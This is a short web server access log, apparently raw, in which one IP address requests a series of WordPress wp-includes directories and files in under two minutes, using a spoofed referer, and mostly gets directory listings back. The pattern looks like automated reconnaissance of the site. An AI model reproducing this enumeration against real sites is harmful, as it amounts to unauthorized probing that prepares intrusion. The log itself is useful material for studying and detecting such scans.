206.189.136.242 - - [27/May/2025:22:45:38 +0000] "GET /wp-includes/Text/Diff/Renderer/ HTTP/1.1" 200 850 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:45:46 +0000] "GET /wp-includes/blocks/ HTTP/1.1" 500 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:45:53 +0000] "GET /wp-includes/pomo/ HTTP/1.1" 200 1706 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:46:00 +0000] "GET /wp-includes/pomo/ HTTP/1.1" 200 1706 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:46:08 +0000] "GET /wp-includes/sitemaps/ HTTP/1.1" 200 2013 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:46:18 +0000] "GET /wp-includes/sitemaps/ HTTP/1.1" 200 2013 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:46:29 +0000] "GET /wp-includes/sitemaps/providers/ HTTP/1.1" 200 1270 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:46:35 +0000] "GET /wp-includes/sitemaps/providers/ HTTP/1.1" 200 1270 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:46:42 +0000] "GET /wp-includes/widgets/ HTTP/1.1" 200 4621 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:46:45 +0000] "GET /wp-includes/widgets/ HTTP/1.1" 200 4621 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:46:53 +0000] "GET /wp-includes/widgets/class-wp-widget-block.php HTTP/1.1" 500 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:46:59 +0000] "GET /wp-includes/css/ HTTP/1.1" 200 8335 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:47:06 +0000] "GET /wp-includes/css/dist/ HTTP/1.1" 200 3174 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
